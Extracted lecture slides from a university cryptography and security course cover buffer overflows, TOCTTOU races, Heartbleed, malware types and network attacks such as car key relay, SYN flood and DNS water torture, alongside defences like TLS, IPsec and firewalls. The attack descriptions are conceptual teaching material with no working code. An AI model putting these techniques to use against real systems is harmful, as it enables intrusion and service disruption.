• Background: more on Unix

Wenjing Zhang

• Unix set-uid mechanism

– UID (User Identifier): A number assigned to
users on UNIX-like systems, controlling
access to resources by identifying the user
owner
– Set-uid (set user ID): A file permission where
an executable program runs with its owner's
permissions, allowing for potential privilege
elevation
– There are legitimate needs for elevating a
process’ privilege to perform its jobs, e.g.
passwd command
29
CIS 4520
Introduction to
Cryptography
Buffer Overflow

• So what?
Wenjing Zhang

– Shell runs with same permissions as program

we overflowed!
– If you successfully overflow a program
• Owned by the root
• Has the set-uid bit set for the owner
• Program fails to ensure that a write to a buffer is
always within its bound
– How do you know?
– You get “Segmentation fault” with malicious input
• Invoke a “shellcode”
– You can invoke a shell as root…

30
CIS 4520
Introduction to
Cryptography
Buffer Overflow
Wenjing Zhang
• When buffer overflow happens, data structures in
memory will be corrupted, potentially changing
the program’s behavior.
– In many cases it can lead to the execution of arbitrary
code by attackers
• A common problem for unsafe programming
languages such as C and C++.
• Local privilege escalation vulnerability, i.e. an
attacker who already obtained local access on the
system can escalate his privilege.
– If the setuid program is owned by root, an attacker who
has user account privilege may gain root privilege on the
system.

31
CIS 4520
Introduction to
Cryptography
Buffer Overflow
Wenjing Zhang
• Buffer overflow controls
– Tools: ProPolice, Stackguard
– Idea: use a “canary” before return addr
• a reference to the canaries once used in coal mines to
detect dangerous gases.
• Canary = random number cuf
• Put there before func call
• Check after function buf
finishes
• If canary isn't dead, old base pointer
continue canary word
return address (EIP)
10
20
30
main’s frame
32
CIS 4520
Introduction to
Cryptography
Race Conditions

• Parallel threads or processes

Wenjing Zhang

– No guarantee of processing order (unless you

very carefully manage it)
– May access the same resource at the “same”
time
– Unanticipated behavior…

33
CIS 4520
Introduction to
Cryptography
TOCTTOU

• Time of Check to Time of Use

Wenjing Zhang

• Real world example, purchase at a store:

Time of check
– Costs $100
– You count out the money on the counter

– Cashier turns around, you take $20 back

Time of use
– Cashier doesn't notice
– Still get the $100 item

34
CIS 4520
Introduction to
Cryptography
TOCTTOU

• Software security example: pseudocode for

Wenjing Zhang

opening file stuff.txt: Time of check

Time of use if (permission(user, stuff.txt))

open(stuff.txt)
else
return failure

35
CIS 4520
Introduction to
Cryptography
TOCTTOU

• Software security example: pseudocode for

Wenjing Zhang

opening file stuff.txt: Time of check

Time of use if (permission(user, stuff.txt))

open(stuff.txt)
else
return failure

• Suppose that stuff.txt is a symlink

• What would happen if we switched the
link to a different file?

36
CIS 4520
Introduction to
Cryptography
TOCTTOU

• TOCTTOU is unlikely?
Wenjing Zhang

– Timing would have to be perfect.

• But:
– can run program over and over
– only have to get it right once
– can run many other programs to lengthen time
between check and open

37
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

The Heartbleed Bug

CIS 4520
Introduction to
Cryptography
OpenSSL “Heartbleed” Bug
Wenjing Zhang
• Announced April, 2014. (But bad code has been
in use since December 31, 2011!)
• Exploits a programming mistake in the OpenSSL
implementation of the TLS “heartbeat hello”
extension.
– Heartbeat protocol is used to keep a TLS connection
alive without continuously transferring data.
– One endpoint (e.g., a Web browser) sends a
HeartbeatRequest message containing a payload to the
other endpoint (e.g. a Web server).
– The server then sends back a HeartbeatReply message
containing the same payload.
– “Buffer over-read” error caused by a failure to check for
an invalid read-length parameter.

39
CIS 4520
Introduction to
Cryptography
OpenSSL “Heartbleed” Bug
Wenjing Zhang
• Heartbeat Request and Response Messages

Problem: no check that

struct { payload_length matches the
HeartbeatMessageType type; actual length of the payload
uint16 payload_length;
opaque payload[HeartbeatMessage.payload_length];
opaque padding[padding_length];
} HeartbeatMessage;

• The total length of a HeartbeatMessage MUST NOT exceed

2^14 or max_fragment_length.

type: heartbeat_request or heartbeat_response

payload_length: The length of the payload
payload: The payload consists of arbitrary content
padding: The padding is random content that MUST
be ignored by the receiver.
40
CIS 4520
Introduction to
Cryptography
OpenSSL “Heartbleed” Bug
Wenjing Zhang

Source:
http://www.theregister.co.uk/2014/04/09/heartbleed_explained/
41
CIS 4520
Introduction to
Cryptography
OpenSSL “Heartbleed” Bug
Wenjing Zhang

42
CIS 4520
Introduction to
Cryptography
Open Source vs. Closed Source

• Discussion: Which is better: Open source

Wenjing Zhang

or closed?
– Argument: Closed source more secure because
it’s harder to find flaws to exploit.
– Argument: Open source more secure because
more eyes on code.
– What’s your take?

43
CIS 4520
Introduction to
Cryptography
Open Source vs. Closed Source

• Discussion: Which is better: Open source

Wenjing Zhang

or closed?
– Argument: Closed source more secure because
it’s harder to find flaws to exploit.

– but there are tools for finding flaws

– patches tell you where to look
– fewer people looking at code
– often longer to release fixes

44
CIS 4520
Introduction to
Cryptography
Open Source vs. Closed Source

• Discussion: Which is better: Open source

Wenjing Zhang

or closed?
– Argument: Open source more secure because
more eyes on code.
– Do you look at the code?
– Code authors can be temporary, weekend
warriors
– Often not very strict quality standards
• Kernels usually good, but drivers, other software
packages can be shoddy
– Code might make job easier on hacker
• Can just do a grep on source for vulnerable
functions
45
CIS 4520
Introduction to
Cryptography
Common Vulnerabilities and Exposures

• The CVE platform

Wenjing Zhang

– CVE is a list of entries - each containing an

identification number, a description, and at
least one public reference - for publicly known
cybersecurity vulnerabilities
– maintained by National Cybersecurity FFRDC
(Federally Funded Research and Development
Center), operated by MITRE
– indexes all publicly known information-
security vulnerabilities and exposures
– CVE prefix + Year + Arbitrary Digits
– Anyone can submit to CVE

46
CIS 4520
Introduction to
Cryptography
Patching

• Patching OS and applications

Wenjing Zhang

– Importance of patching
– Timing: vulnerability window
– 0-day vulnerabilities
– Vulnerability scanning

47
CIS 4520
Introduction to
Cryptography
Non-malicious Program Errors

• Summary:
Wenjing Zhang

– Software testing: code does what it's supposed

to do.
– Software security: code doesn’t do anything it
isn’t supposed to do.
• Much harder
– Program errors could be exploited by
adversaries to gain control of the system,
deploy Trojan horses, etc.

48
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Part 2. Malicious Software

CIS 4520
Introduction to
Cryptography
Malicious Software (a.k.a. Malware)

• Malicious code: designed to do things “it

Wenjing Zhang

isn’t supposed to do”

– Virus (requires a host program to spread)
– trojan horse
– logic bomb (triggered by a specific event)
– time bomb (special case of logic bomb)
– trapdoor (backdoor)
– worm (standalone software that spreads across
multiple systems)
– rabbit (replicate within a single system)
– Rootkit (hide, operate at deep level within OS)

50
CIS 4520
Introduction to
Cryptography
Trojan Horses

• Trojan horses: program with

Wenjing Zhang

– Open, known effect

– And a secret effect
• Example: game that searches hard drive for
passwords

51
CIS 4520
Introduction to
Cryptography
Trojan Horses

• The secret effects of Trojan horses

Wenjing Zhang

– Control the computer (Zombie computers)

– Steal information: passwords, bank accounts,
credit card numbers, SSN, etc.
– Install (malicious) software
– Monitor and control hardware: key logger,
watch screen, view webcam
– More?

52
CIS 4520
Introduction to
Cryptography
Viruses

• Viruses: program which

Wenjing Zhang

– infects other files (inserts itself into)

– performs some action
• Many types:
– boot sector
– executable file infector
– multipartite (different targets e.g. either boot
sector or exe)
– encrypted viruses
– polymorphic viruses
– macro virus

53
CIS 4520
Introduction to
Cryptography
Viruses

• How Viruses Attach?

Wenjing Zhang

– Appended (prepended)
– Surrounding
– Replace
– Example: windows .com precedence over .exe
• virus is calc.com
• when you run calc
• calc.com runs
• then it calls calc.exe
• virus renames itself to calc.exe and then moves old
calc.exe to different filename or hidden filename to
directory that’s not often accessed

54
CIS 4520
Introduction to
Cryptography
Viruses

• How Virus Attach

Wenjing Zhang

– Integrated

– Requires more detailed knowledge about

program structure

55
CIS 4520
Introduction to
Cryptography
Viruses

• Boot Sector Virus

Wenjing Zhang

– Normal boot operation:

• BIOS (Basic Input/Output System)
• Master Boot Record (MBR)
• Partition boot sector, aka. volume boot sector/record
• Operating system
– Virus example: Michelangelo (1991)
• moved MBR someplace else (last sector of root dir)
• copied itself into MBR
• on boot, Michelangelo ran, then normal MBR
• spread by copying itself to floppy disks
• March 6 (artist’s bday), trashes hard disk

56
CIS 4520
Introduction to
Cryptography
Viruses

• Document Virus
Wenjing Zhang

– Malicious programs that are embedded within

documents
– Often use macros to execute malicious code
– Macros are sets of instructions that automate
tasks, for example
• Microsoft's Visual Basic for Applications (VBA)
• Commonly used in Word, Excel, etc.
– Hiding within default template docs:
• MS Office: Normal.dot, Personal.xls, Blank.pot
• Propagate whenever a user unintentionally creates a
new document based on infected template

57
CIS 4520
Introduction to
Cryptography
Viruses
Wenjing Zhang • Virus Detection
– detect change in file size
• often add or remove code to a file, which changes its
original size
• virus writer counter move: remove or compress part
of original file to mask the change in file size
– look for virus signature
• digital fingerprint unique to each virus
• used by antivirus software to identify and remove
viruses
• virus writer counter-move: polymorphism,
encryption, use a kit to write a different virus with
similar effect

58
CIS 4520
Introduction to
Cryptography
Viruses vs. Trojan Horses

• Differences between Viruses and Trojan

Wenjing Zhang

horses?
– Viruses:
• Malicious programs that self-replicate
• Spread to other computers/files
• Require user action to initiate (e.g., opening an
email attachment)
– Trojan Horses:
• Malware posing as legitimate software
• Do not self-replicate
• Cause damage by creating backdoors for other
malware

59
CIS 4520
Introduction to
Cryptography
Discussions

• True or false:
Wenjing Zhang

– Viruses can only affect MS Windows

– Viruses can modify hidden or read-only files
– Can't remain in memory after power-off
– Viruses can't infect hardware

60
CIS 4520
Introduction to
Cryptography
Worms
Wenjing Zhang
• Worms: standalone software that propagates from
one computer to another over network
• Morris Worm – Nov. 2, 1988
– First worm released in the history
– Written by Robert Morris, then a student at Cornel
– Released from MIT
– “to gauge the size of the Internet”: by observing how
widely and rapidly the worm could spread
– Scan and exploit Unix machines vulnerabilities to
connect and infect
• e.g., buffer overflow, weak authentication, trust within network
– Re-infects targets at 1/7 rate → DoS attacks
– First person convicted (1990) of violating the Computer
Fraud and Abuse Act: three years of probation, 400
hours of community service, a fine of $10,050, and the
costs of his supervision.
61
CIS 4520
Introduction to
Cryptography
Rootkits

• Definition
Wenjing Zhang

– a collection of malicious software tools that are

installed on a computer without the user's
knowledge
• Purposes
– designed to gain unauthorized root or
administrative access to your computer
– maintain persistent and undetectable presence
on the system
– monitor and control the system by an attacker

62
CIS 4520
Introduction to
Cryptography
Rootkits

• Sony XCP Rootkit

Wenjing Zhang

– Extended Copy Protection (XCP)

• Intention: copy protection of CDs
– Affects MS Windows
– Installs itself through AutoRun
– Three components:
• Anti-copying program
• Stealth component: hides program’s existence
deeply within OS to prevent copying music
• “Phone home” feature: contacts Sony
– Tells Sony user's listening habits, when disk is
played, and from where, for ads, etc
– CD contains no uninstaller

63
CIS 4520
Introduction to
Cryptography
Rootkits

• Sony XCP program loaded with autorun

Wenjing Zhang

– Displays EULA (End User License

Agreement)
– Load program when inserting music CDs
– Runs before user agrees
• Doesn’t mention
– “Phone home” feature
• Consequences
– Lawsuits and a recall of affected CDs
– Sony released a removal tool for the software

64
CIS 4520
Introduction to
Cryptography
Rootkits
Wenjing Zhang • How Rootkits get into computers?
– Phishing Attacks
• users tricked into downloading malicious
attachments or clicking on malware-laden links
– Drive-by Downloads
• automatic downloads from compromised websites
– Software Vulnerabilities
• exploits in unpatched operating systems,
applications, or services
– Physical Access
• direct installation by an individual with access to the
computer
– Infected External Devices
• introduced via USB drives or other external media
65
CIS 4520
Introduction to
Cryptography
Rootkits
Wenjing Zhang • Prevention
– Use up-to-date antivirus and anti-rootkit tools
– Regularly apply security patches to all
software
– Employ safe browsing and email handling
practices
– Enforce strong security policies and user
permissions
– Be cautious with external devices and software
installations

66
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

Software Security Controls

CIS 4520
Introduction to
Cryptography
Software Security Controls

• Developmental Controls
Wenjing Zhang

– Good software engineering practice

– Modularity
– Encapsulation, information hiding
– Separation, isolation
– Layering
– Testing
– Peer reviews
– Designing good specifications
– Least astonishment
– Proofs of program correctness
– Fail safe mechanisms
68
CIS 4520
Introduction to
Cryptography
Software Security Controls

• Operating Systems Controls

Wenjing Zhang

– trusted software
– protection, confinement
– limited privilege
– logging

69
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

CIS 4520 Introduction to Cryptography

Network Security

Wenjing Zhang
[email protected]
CIS 4520
Introduction to
Cryptography
Outline

•
Wenjing Zhang
Introduction
• Terminologies
• Network Attacks
• Network Security Controls
• Application Security
– Web Security
• Phishing
• SQL Injection
– Email Security

2
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

1. Introduction
CIS 4520
Introduction to
Cryptography
Network Security Topics

• Vulnerabilities, Threats, and Attacks

Wenjing Zhang

– 7-layer OSI model or TCP/IP model

– Threats on each layer
• Network Security Protocols
– Kerberos, SSL/TLS, SSH, HTTPS, IPSec
• Security Systems
– Firewalls
– Intrusion detection systems (IDS)
• Application Security
– Web
– Email
4
CIS 4520
Introduction to
Cryptography
Network Model & Protocols (OSI)
Wenjing Zhang

Source: BMC Software

5
CIS 4520
Introduction to
Cryptography
Network Model: OSI vs. TCP/IP

• Both models conceptualize network

Wenjing Zhang

communication
– TCP/IP: widely implemented, practical
– OSI: structured, detailed understanding

6
CIS 4520
Introduction to
Cryptography
Network Security Topics
Wenjing Zhang TCP/IP Common Security Countermeasures
Model Attacks
Physical Packet Sniffing Encryption (SSH, SSL/TLS,
Layer (1) HTTPS)
Data Link Address Resolution Network Segmentation
Layer (2) Protocol (ARP) (Virtual Local Area
Poisoning Networks - VLANs)
Network Denial of Service
Layer (3) Intrusion Detection Systems
IP Spoofing (for TCP
Hijacking) (IDS)

Ping of Death Firewall, IDS

Smurf attack IDS
Transport TCP Hijacking IPSec
Layer (4)
Denial of Service (e.g., Ingress filtering, IDS
SYN Flood)

7
CIS 4520
Introduction to
Cryptography
Network Security Topics
Wenjing Zhang
TCP/IP Common Security Countermeasures
Model Attacks
Application Software Bugs/Buffer IDS
Layer (5) Overflows
DNS Water Torture Firewalls
SQL
injection Web Application Firewalls
Web Cross-site
security (WAFs)
scripting
(XSS)
Email Security PGP, SSH encryption
Social Engineering Security Education

8
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

2. Terminologies:

Crypto Primitives,
Cryptographic Protocols,
Network Security Protocols,
Network Security Systems
CIS 4520
Introduction to
Cryptography
Crypto Primitives

•
Wenjing Zhang
Block Ciphers
• Stream Ciphers
• Hash Functions
• Public Key Encryption/Decryption
• Public Key Signing/Verification
• …
• All primitives can be seen as an algorithm
(or a function) with well-defined inputs
and outputs

10
CIS 4520
Introduction to
Cryptography
Cryptographic Protocols

• Utilize Cryptographic primitives

Wenjing Zhang

• A sequence of steps where each step uses

cryptographic functions

• For example, CBC defines a protocol for

encrypting a file or a packet
– CBC involves repeated use of a simple
function (a block cipher) in a specific manner

11
CIS 4520
Introduction to
Cryptography
Network Security Protocols

• Network protocols: in networking, a

Wenjing Zhang

protocol is a set of rules that allow two or

more entities to communicate.
– Examples: HTTP, FTP, TLS, etc.

• Network security protocols: a set of rules

and configurations that determine how to
secure data as it travels across the network.
– Examples: HTTPS, SSL/TLS, SSH, Ipsec, etc.

12
CIS 4520
Introduction to
Cryptography
Network Security Systems
Wenjing Zhang • IDS (Intrusion Detection System):
– Monitors network/system for malicious activities.
– Reports detected activities to an administrator.
• Firewalls:
– Monitors and controls incoming/outgoing
network traffic.
– Establishes a barrier against external threats.
– Can be hardware, software, or both.
• Note: IDS and Firewalls are not protocols
but part of a security infrastructure; they are
security systems that utilize protocols to
secure networks.
13
CIS 4520
Introduction to
Cryptography
Comparison & Connection
Wenjing Zhang • Cryptographic Primitives:
– Basic, low-level cryptographic algorithms.
– Provide basic security functions: encryption, hashing,
digital signatures.
– Examples: AES, SHA-256, RSA.
• Network Security Protocols:
– Higher-level constructs using cryptographic primitives.
– Secure complex operations: secure communication,
authentication, key exchange.
– Examples: SSL/TLS, SSH, HTTPS, IPsec.
• Connection:
– Cryptographic primitives are the building blocks for
network security protocols, which are designed to
secure higher-level operations.

14
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

3. Network Attacks
CIS 4520
Introduction to
Cryptography
Physical Layer Security: Example

• Wireless communication systems attack

Wenjing Zhang

– Passive keyless entry and start (PKES) systems

Francillon, A., Danev, B., & Capkun, S. (2011). Relay attacks on passive keyless entry and start
systems in modern cars. In Proceedings of the Network and Distributed System Security
Symposium (NDSS). ETH Zürich, Department of Computer Science.

16
CIS 4520
Introduction to
Cryptography
Physical Layer Attack: Example

• Relay attacks on passive keyless entry and

Wenjing Zhang

start (PKES) systems

17
CIS 4520
Introduction to
Cryptography
Physical Layer Attack: Example

• Relay attacks on PKES systems

Wenjing Zhang

– Relay on a parking lot

• One antenna near the elevator
• Attacker at the car while car owner waits
for the elevator
– Keys in locked house, car parked in front of
the house
• E.g., keys left on the kitchen table; put an
antenna close to the window; open and start
the car without entering the house
• Tested in practice
Francillon, A., Danev, B., & Capkun, S. (2011). Relay attacks on passive keyless entry and start
systems in modern cars. In Proceedings of the Network and Distributed System Security
Symposium (NDSS). ETH Zürich, Department of Computer Science.

18
CIS 4520
Introduction to
Cryptography
Physical Layer Attack: Example

• Relay Attacks on Car models with PKES

Wenjing Zhang

– 10 models from 8 manufacturers

– Including KIA Soul, Volkswagen Tiguan
– All use LF/UHF technology

19
CIS 4520
Introduction to
Cryptography
Physical Layer Attack: Example
Wenjing Zhang
• Relay attacks intercept and boost the key fob's
signal, using devices to increase communication
range with the car.

• Encryption does not prevent relay attacks on car

entry/start systems, which use signal delay and
amplification rather than content decryption
– use wireless communication properties to bypass
encryption

20
CIS 4520
Introduction to
Cryptography
Physical Layer Attack: Countermeasure
Wenjing Zhang
• Time-of-flight systems: detect extended signal
travel time to prevent relay attacks.
• Distance bounding: ensures key fobs are close
enough to prevent distant signal relays.
• Frequency hopping: complicates signal
interception by constantly changing frequencies.
• Reducing key fob power: limits operational range,
deterring distant attackers.
• Bi-directional authentication: confirms the key
fob's physical presence, not just signal presence.

21
CIS 4520
Introduction to
Cryptography
NO Attacks On This Model!
Wenjing Zhang

22
CIS 4520
Introduction to
Cryptography
Network Layer Attack: Examples

• Ping of death
Wenjing Zhang

• Smurf
• DDoS: traffic redirection (i.e. attack
routing algorithms)

23
CIS 4520
Introduction to
Recap: Denial of Service (DoS)
Cryptography

Wenjing Zhang
• Definition: malicious attempts to disrupt
the normal functioning of a targeted
system, network, or service.
– Make target inaccessible to its intended users
by overwhelming it with illegitimate traffic.
• Types of DoS Attacks:
– Flooding Attacks: Overwhelm the target with a
flood of traffic beyond its capacity to handle.
– Resource Exhaustion Attacks: Exploit
vulnerabilities to exhaust system resources
such as memory, CPU, or bandwidth.
– Distributed Denial of Service (DDoS):
Coordinated attacks using multiple
compromised devices or systems (botnets).
24
CIS 4520
Introduction to
Cryptography
Ping of Death
Wenjing Zhang • Ping (ICMP echo) packet: 64 bytes
– ICMP (Internet Control Message Protocol)
• TCP/IP specification: maximum packet
size of 65,536 bytes.
• Ping of death attack: send oversized ICMP
datagrams (encapsulated in IP packets) to
the victim.
– Some systems, upon receiving the oversized
packet, will crash, freeze, or reboot, resulting
in denial of service, e.g., buffer overflow
• Can configure firewalls to block ICMP
echo requests or limit their size.
25
CIS 4520
Introduction to
Cryptography
Smurf attacks

• A host sending an ICMP echo request

Wenjing Zhang

26
CIS 4520
Introduction to
Cryptography
Distributed Denial of Service (DDoS)
Wenjing Zhang
• Attack vulnerable systems
– exploit system vulnerabilities or trick into downloading
trojan
• Create zombie networks
• Direct zombies to attack victim

27
CIS 4520
Introduction to
Cryptography
Transport Layer Attack: Syn-flood

• Syn-flood: TCP half-open

Wenjing Zhang

• To establish a legitimate TCP connection:

– the client sends a SYN packet to the server

28
CIS 4520
Introduction to
Cryptography
Transport Layer Attack: Syn-flood

• To establish a legitimate TCP connection:

Wenjing Zhang

– the client sends a SYN packet to the server

– the server sends a SYN-ACK back to the client

29
CIS 4520
Introduction to
Cryptography
Transport Layer Attack: Syn-flood

• To establish a legitimate TCP connection:

Wenjing Zhang

– the client sends a SYN packet to the server

– the server sends a SYN-ACK back to the client
– the client sends an ACK back to the server to
complete the three-way handshake

30
CIS 4520
Introduction to
Cryptography
Transport Layer Attack: Syn-flood

• Syn-flood attack
Wenjing Zhang

– Attacker initiating a TCP connection to the

server with a SYN.
– The server reserves resources and replies with
a SYN-ACK
– The client then doesn’t send back a ACK

31
CIS 4520
Introduction to
Cryptography
Transport Layer Attack: Syn-flood

• The attacker floods the target system with a

Wenjing Zhang

large volume of SYN packets but does not

respond to subsequent SYN-ACK packets.
• This leads to the accumulation of half-open
connections on the target system, consuming
resources such as memory and CPU.
• As a result, legitimate users may be unable
to establish connections with the target
system, leading to denial-of-service
conditions.

32
CIS 4520
Introduction to
Cryptography
Application Layer: DNS Water Torture

• Attack Overview:
Wenjing Zhang

– Targets the Domain Name System (DNS), an

application layer protocol for translating
domain names into IP addresses and vice
versa.
• Attack Method:
– Involves flooding a DNS server with a large
number of DNS queries.
– Queries often use randomized or non-existent
domain names.
– Goal is to overwhelm the DNS server's
resources, such as cache, processing capacity,
or network bandwidth.
33
CIS 4520
Introduction to
Cryptography
DNS Water Torture
Wenjing Zhang
• DNS Water Torture
– Send random DNS queries – recursive queries!
– Open resolvers query cache DNS servers: domain not
found
– The queries go all the way to authoritative DNS servers!

34
CIS 4520
Introduction to
Cryptography
DNS Water Torture
Wenjing Zhang
• DNS provider Dyn was attacked on 10/21/2016
• DDoS coming from 10s of millions of IPs (IoT devices)
• Affected websites: Amazon, Twitter, Netflix, Spotify,
PayPal, AirBnb, Reddit, Tumblr, GitHub and the New York
Times, etc.

35
CIS 4520
Introduction to
Cryptography

Wenjing Zhang

4. Controls
CIS 4520
Introduction to
Cryptography
Network Security Controls

•
Wenjing Zhang
Architecture & design
• Encryption
• Network security protocols
• Network security systems: firewall, IDS,
security intelligence, etc.

37
CIS 4520
Introduction to
Cryptography
Architecture & Design

• Segmentation/separation
Wenjing Zhang

38
CIS 4520
Introduction to
Cryptography
Architecture & Design

• Segmentation/separation
Wenjing Zhang

– De-Militarized Zone (DMZ)

39
CIS 4520
Introduction to
Cryptography
Architecture & Design
Wenjing Zhang • Segmentation/separation
• Redundancy: having backup systems in
place to ensure service continuity.
– Failover mode: if one system fails, another
standby system automatically takes over to
maintain service availability.
– Cloud services: can offer high availability and
distributed resources to handle failover.
• Eliminate single points of failure
• Fast recovery
– minimizing downtime and restoring services as
quickly as possible.
40
CIS 4520
Introduction to
Cryptography
Network Security Controls

•
Wenjing Zhang
Architecture & design
• Encryption
• Network security protocols
• Network security systems: firewall, IDS,
security intelligence, etc.

41
CIS 4520
Introduction to
Cryptography
Encryption

• Encryption remains the most important and

Wenjing Zhang

effective control against many network

threats.
• However, it does NOT solve all the
problems!
– Recall the relay attacks on car models with
passive keyless entry and start (PKES)
systems.

42
CIS 4520
Introduction to
Cryptography
Encryption
Wenjing Zhang • Link encryption
– Protect data transmitted over un-trusted
physical links
– Transparent to the user (upper layers)
– Messages are decrypted at routers

43
CIS 4520
Introduction to
Cryptography
Encryption
Wenjing Zhang
• End-to-end encryption
– Application/presentation layer encryption
• email communication, messaging apps, etc.
– No decryption in transit
– Protect data confidentiality against flawed or
untrusted lower layers

44
CIS 4520
Introduction to
Cryptography
Encryption

• Encryption remains the most important and

Wenjing Zhang

45
CIS 4520
Introduction to
Cryptography
Network Security Controls

•
Wenjing Zhang
Architecture & design
• Encryption
• Network security protocols
• Network security systems: firewall, IDS,
security intelligence, etc.

46
CIS 4520
Introduction to
Cryptography
Network Security Protocols

• SSL/TLS
Wenjing Zhang

– Secure sockets layer / Transport layer security

– Used mainly to secure Web traffic
– HTTPS: HTTP protocol over SSL/TLS
encryption
• SSH
– Secure Shell
– Remote login
– ssh <username>@linux.socs.uoguelph.ca
• IPsec
– IP-level security suite

47
CIS 4520
Introduction to
Cryptography
SSL/TLS
Wenjing Zhang • Mid’90s introduced concerns over credit card
transactions over the Internet
• SSL (Secure Sockets Layer) designed to respond
to these concerns, develop e-commerce
• Initially designed by Netscape, moved to IETF
(Internet Engineering Task Force) standard later
– SSLv2 1994
– SSLv3 1996
• Fixed security problems
– TLS v1.0 1999
• IETF standard
– TLS v1.1 2006
– TLS v1.2 2008
– TLS v1.3 2018

48
CIS 4520
Introduction to
Cryptography
SSL/TLS
Wenjing Zhang • SSL Model: handshake protocol for
establishing a secret between client and
server (plus server authentication)
(asymmetric primitives + PKI)
• Server authentication (X.509 certificate)
– Client authentication (optional)
• Encrypted communication
– Implements a socket interface
– Any socket-based application can be made to
run on top of SSL
• Protect against:
– Eavesdroppers, MITM attacks
49
CIS 4520
Introduction to
Cryptography
SSL/TLS

• SSL sequence
Wenjing Zhang

– Negotiate parameters
– Key exchange
– Authentication
– Session

50
CIS 4520
Introduction to
Cryptography
SSL/TLS

• Negotiation
Wenjing Zhang

– Choice of encryption and hash functions, key

exchange algorithms, protocol versions
– E.g.: choice of 40- or 128-bit keys
• Key exchange
– Diffie-Hellman key exchange
– RSA-based key exchange
• Encrypt secret key s with public key of server

51
CIS 4520
Introduction to
Cryptography
SSL/TLS
Wenjing Zhang • SSL authentication
– Anonymous (no authentication)
– RSA authentication (implicit)
– Sign Diffie-Hellman parameters
• Secure communication
– Encryption: RC4 (Rivest Cipher 4, stream
cipher), also DES, 3DES, AES, ...
– Authentication: HMAC (Hash-based Message
Authentication Code), using MD5 or SHA1

– Why DES? It is insecure!

– TLS 1.2 supports DES. However, the server
and/or the client may choose to reject it.
52
CIS 4520
Introduction to
Cryptography
SSL/TLS
Wenjing Zhang • SSL sequence

53
CIS 4520
Introduction to
Cryptography
SSL/TLS

• TLS 1.3
Wenjing Zhang

secure communication
channel is established
54
CIS 4520
Introduction to
Cryptography
SSL/TLS

• TLS 1.3 stopped supporting all these

Wenjing Zhang

ciphers
– RC4 Stream Cipher
– RSA Key Exchange
– SHA-1 Hash Function
– CBC (Block) Mode Ciphers
– MD5 Algorithm
– Various non-ephemeral Diffie-Hellman groups
– EXPORT-strength ciphers
– DES
– 3DES

55
CIS 4520
Introduction to
Cryptography
SSL/TLS

• TLS 1.3
Wenjing Zhang

– Uses Diffie-Hellman key agreement

– There is a mechanism in TLS 1.3 that could
prevent MITM attacks.

56
CIS 4520
Introduction to
Cryptography
SSH
Wenjing Zhang • SSH: Secure Shell
– An essential tool for managing servers,
securely transferring files, and performing a
host of other secure network functions
– Designed in 1995 by Tatu Ylonen, replaced in
1996 by SSHv2
– Fixed security holes, eventually standardized
• SSH: Example
– To access the SoCS Linux server, we must use
SSH
– ssh <username>@linux.socs.uoguelph.ca
– Username and Password are the same as what
we log into WebAdvisor with Central login
57
CIS 4520
Introduction to
Cryptography
SSH
Wenjing Zhang
• Similar to SSL:
– Operates on a client-server model with a
socket-like interface
• Replaces (insecure) UNIX remote login
– where usernames, passwords, and commands,
were transmitted in plaintext
• Flexible authentication architecture
– Password, public key, SecureID, Kerberos, ...
• Compare with SSL:
– No certificates, relies on a trust-on-first-use
model
– Client remembers the public key associated
with host
58
CIS 4520
Introduction to
Cryptography
IP Security Issues
Wenjing Zhang • When an entity receives an IP packet, it has
no assurance of:
– Data source authentication/data integrity:
• Packet comes from the source it claims to
• Content of packet should remain unchanged
during transport
• The recipient should be the intended one
– Confidentiality
• The original data was not inspected by a
third party while the packet was sent from
the sender to the receiver

59
CIS 4520
Introduction to
Cryptography
IP Security Issues & IPSec
Wenjing Zhang
• Eavesdropping
• Modification of packets in transit
• Identity spoofing (forged source IP addresses)
• Denial of Service
• Many solutions are application-specific
– TLS for Web, S/MIME (Secure/Multipurpose
Internet Mail Extensions) for email, SSH for
remote login
• IPSec aims to provide a framework of open
standards for secure communications over IP
– Protect every protocol running on top of IPv4
and IPv6

60
CIS 4520
Introduction to
Cryptography
IPSec
Wenjing Zhang
• Internet Protocol Security (IPSec)
• Method of protecting IP datagrams
– units of information exchanged over internet
• Protection for IP and upper-layer protocols
• Designed for IPv6, backported to IPv4
• Two Options:
– AH (Authentication Header)
– ESP (Encapsulated Security Payload)
• Two Modes:
– Transport mode: use the original IP header
– Tunnel mode: use a new IP header

61
CIS 4520
Introduction to
Cryptography
AH (Authentication Header)
• Provides source authentication, data integrity, NO
Wenjing Zhang
confidentiality
– Simple design: add header with authentication data
between IP header, data field.
– Security parameters
– Authentication data (usu. SHA1-HMAC)
– Protocol field: 51

Source: Wikipedia
62
CIS 4520
Introduction to
Cryptography
AH (Authentication Header)
Wenjing Zhang • AH header includes:
– connection identifier
– authentication data: source-signed message digest
calculated over original IP datagram
– next header field specifies data type (e.g., TCP, UDP,
ICMP)

Source: Wikipedia
63
CIS 4520
Introduction to
Cryptography
ESP (Encapsulated Security Payload)
Wenjing Zhang
• Provides confidentiality, host authentication,
data integrity.
– Encapsulate datagram rather than add a header
– Next header field is in ESP trailer
– ESP format: Security Parameters Index, Sequence
Number, Payload Data, Padding, Pad Length, Next
Header, Authentication Data
– Protocol field: 50

Source: Wikipedia
64
CIS 4520
Introduction to
Cryptography
IPSec
Wenjing Zhang

65
CIS 4520
Introduction to
Cryptography
Network Security Controls

•
Wenjing Zhang
Architecture & design
• Encryption
• Network security protocols
• Network security systems: firewall, IDS,
security intelligence, etc.

66
CIS 4520
Introduction to
Cryptography
Firewalls

• From RFC 1636

Wenjing Zhang

– “hard crunchy outside. soft chewy inside”

• Bellovin, Shifting the Odds
– “firewalls are a networking response to a
software engineering problem”

67
CIS 4520
Introduction to
Cryptography
Firewall Types

• Packet filter
Wenjing Zhang

• Stateful packet filter

• Application-, transport-layer gateways

68
CIS 4520
Introduction to
Cryptography
Firewall Tasks

• Allow or block traffic

Wenjing Zhang

– based on source IP and/or destination IP,

and/or destination port
– filter traffic coming 'in' or going 'out’
• Question: can we block based on source
port?
• Answer: why bother?
– Ports are numerous (ranging from 0 to 65535)
and are not as strongly associated with the
identity of the sender as IP addresses are
– attacker can choose any arbitrary source port
– not reliable indicators for filtering traffic
69
CIS 4520
